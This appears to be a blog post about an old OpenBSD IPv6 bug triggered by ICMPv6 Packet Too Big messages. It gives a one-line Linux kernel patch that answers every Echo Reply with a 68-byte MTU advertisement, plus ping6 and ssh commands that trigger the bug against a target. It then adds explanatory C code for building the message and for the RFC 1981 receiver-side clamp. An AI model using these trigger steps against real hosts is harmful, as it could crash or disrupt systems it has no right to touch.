Don't see these very often (although it's certainly happened more than once, contrary to their claims), and it only applies to OpenBSD systems on IPv6 networks, but still, interesting.
I'm not 100% clear on the details, but it appears to be some sort of race condition involving receiving a low-MTU ICMP datagram then initiating a TCP/IPv6 connection.
To exploit this vulnerability, you will need a Linux system. Edit Linux 2.4.24's net/ipv6/icmp.c: in the switch on the ICMPv6 type in icmpv6_rcv(), find the ICMPV6_ECHO_REPLY case, which normally does nothing, and add one line so that every Echo Reply the box receives is answered with an ICMPv6 Packet Too Big message advertising an MTU of 68 bytes (far below the 1280-byte IPv6 minimum):

    case ICMPV6_ECHO_REPLY: /* we couldn't care less */
        /* type PKT_TOOBIG, code 0, info = MTU 68, sent back to the reply's source */
        icmpv6_send(skb, ICMPV6_PKT_TOOBIG, 0, 68, skb->dev); //joro
        break;
Recompile. Reboot.
Then, from the patched Linux box, with openbsd standing for the target host:

    ping6 openbsd     (the target's Echo Reply now earns it a Packet Too Big with MTU 68)
    ssh -6 openbsd    (the TCP/IPv6 connection that follows is what triggers the bug)
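As an added example (my own code, not Guninski's and not taken from the kernel), here is what that one-line patch makes the kernel put on the wire, built by hand, beside the receiver-side check that ought to make a 68-byte advertisement harmless: RFC 1981 forbids lowering a path MTU below the 1280-byte IPv6 minimum, so a compliant host clamps rather than trusts it. The two addresses are constructed documentation addresses, the quoted "offending" packet is constructed, and nothing here claims to be OpenBSD's actual fix; it shows the message format, its pseudo-header checksum, and the clamp.

```c
/* Added example (not from the page or from Guninski): build the ICMPv6 Packet
 * Too Big that the patched kernel emits (MTU 68) and apply the receiver-side
 * rule that no IPv6 path MTU may drop below 1280. Addresses are constructed. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define ICMP6_PACKET_TOO_BIG 2
#define IPV6_NEXTHDR_ICMP6   58
#define IPV6_MIN_LINK_MTU    1280   /* RFC 2460 section 5 */

/* Constructed 2001:db8::/32 documentation addresses standing in for the two hosts. */
static const uint8_t LINUX_ADDR[16]   = {0x20,0x01,0x0d,0xb8,0,0,0,0,0,0,0,0,0,0,0,1};
static const uint8_t OPENBSD_ADDR[16] = {0x20,0x01,0x0d,0xb8,0,0,0,0,0,0,0,0,0,0,0,2};

/* ICMPv6 checksum: IPv6 pseudo-header (RFC 2460 section 8.1) plus the message. */
static uint16_t icmp6_checksum(const uint8_t *src, const uint8_t *dst,
                               const uint8_t *msg, size_t len)
{
    uint32_t sum = 0;
    size_t i;
    for (i = 0; i < 16; i += 2) sum += (uint32_t)((src[i] << 8) | src[i + 1]);
    for (i = 0; i < 16; i += 2) sum += (uint32_t)((dst[i] << 8) | dst[i + 1]);
    sum += (uint32_t)len;           /* upper-layer length (fits in 16 bits here) */
    sum += IPV6_NEXTHDR_ICMP6;      /* next-header field of the pseudo-header */
    for (i = 0; i + 1 < len; i += 2) sum += (uint32_t)((msg[i] << 8) | msg[i + 1]);
    if (len & 1) sum += (uint32_t)(msg[len - 1] << 8);
    while (sum >> 16) sum = (sum & 0xffff) + (sum >> 16);
    return (uint16_t)~sum;
}

/* Sender side (what the patched kernel does via icmpv6_send): type 2, code 0,
 * the advertised MTU, then as much of the offending packet as fits in the
 * minimum MTU (RFC 4443 section 3.2). Returns the length, 0 if out is too small. */
static size_t build_ptb(uint8_t *out, size_t outlen, uint32_t mtu,
                        const uint8_t *offending, size_t offlen,
                        const uint8_t *src, const uint8_t *dst)
{
    const size_t max_quote = IPV6_MIN_LINK_MTU - 40 - 8; /* minus IPv6 and ICMPv6 headers */
    size_t quote = offlen < max_quote ? offlen : max_quote;
    uint16_t csum;
    if (outlen < 8 + quote) return 0;
    out[0] = ICMP6_PACKET_TOO_BIG;
    out[1] = 0;                                  /* code is always 0 for type 2 */
    out[2] = out[3] = 0;                         /* checksum placeholder */
    out[4] = (uint8_t)(mtu >> 24); out[5] = (uint8_t)(mtu >> 16);
    out[6] = (uint8_t)(mtu >> 8);  out[7] = (uint8_t)mtu;
    memcpy(out + 8, offending, quote);
    csum = icmp6_checksum(src, dst, out, 8 + quote);
    out[2] = (uint8_t)(csum >> 8); out[3] = (uint8_t)csum;
    return 8 + quote;
}

/* Receiver side. Returns -1 unless msg is a well-formed Packet Too Big with a
 * valid checksum; otherwise 0, with the MTU as advertised and the MTU a node may
 * actually install. RFC 1981 section 4: never reduce the estimate below 1280,
 * so a 68-byte advertisement is clamped instead of trusted. */
static int apply_ptb(const uint8_t *msg, size_t len,
                     const uint8_t *src, const uint8_t *dst,
                     uint32_t *advertised, uint32_t *applied)
{
    if (len < 8 || msg[0] != ICMP6_PACKET_TOO_BIG || msg[1] != 0) return -1;
    if (icmp6_checksum(src, dst, msg, len) != 0) return -1; /* re-sum incl. field */
    *advertised = ((uint32_t)msg[4] << 24) | ((uint32_t)msg[5] << 16) |
                  ((uint32_t)msg[6] << 8)  | (uint32_t)msg[7];
    *applied = *advertised < IPV6_MIN_LINK_MTU ? IPV6_MIN_LINK_MTU : *advertised;
    return 0;
}

/* The page's scenario in-process: the Echo Reply "openbsd" sent to "linux"
 * (constructed: IPv6 header + ICMPv6 type 129) is answered with a PTB of 68. */
static int demo(uint32_t *advertised, uint32_t *applied)
{
    uint8_t offending[48], ptb[1280];
    size_t n;
    memset(offending, 0, sizeof offending);
    offending[0] = 0x60;                       /* IPv6 version nibble */
    offending[6] = IPV6_NEXTHDR_ICMP6;
    offending[7] = 64;                         /* hop limit */
    memcpy(offending + 8, OPENBSD_ADDR, 16);   /* the reply came from the victim */
    memcpy(offending + 24, LINUX_ADDR, 16);
    offending[40] = 129;                       /* ICMPv6 Echo Reply */
    n = build_ptb(ptb, sizeof ptb, 68, offending, sizeof offending, LINUX_ADDR, OPENBSD_ADDR);
    if (n != 8 + sizeof offending) return -1;
    return apply_ptb(ptb, n, LINUX_ADDR, OPENBSD_ADDR, advertised, applied);
}

/* A bit flip in the MTU field without fixing the checksum must be dropped: 1 if so. */
static int tamper_rejected(void)
{
    uint8_t ptb[64]; uint32_t a, b; size_t n;
    n = build_ptb(ptb, sizeof ptb, 68, OPENBSD_ADDR, 16, LINUX_ADDR, OPENBSD_ADDR);
    ptb[7] ^= 0x01;                            /* 68 -> 69, checksum now stale */
    return n == 24 && apply_ptb(ptb, n, LINUX_ADDR, OPENBSD_ADDR, &a, &b) == -1;
}

int main(void)
{
    uint32_t adv, app;
    if (demo(&adv, &app) != 0) { fputs("demo failed\n", stderr); return 1; }
    printf("advertised MTU %u, path MTU a compliant receiver installs: %u\n", adv, app);
    return tamper_rejected() ? 0 : 1;
}
```

The checksum helper is the same one a sender and a receiver share: computed over the message with the field zeroed it yields the value to insert, and re-computed over the message with the field in place it yields 0 when everything is intact. On a real network the kernel wraps this message in an IPv6 header for you (a raw IPPROTO_ICMPV6 socket on Linux also recomputes the checksum), so the hand-built checksum here is only for the receiver-side check. The clamp in apply_ptb is the RFC rule, stated in the open; what OpenBSD actually changed to fix the bug is in the vendor's patch, not here.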
The vulnerability discoverer's writeup is a little bit less than scholarly: http://www.guninski.com/obsdmtu.html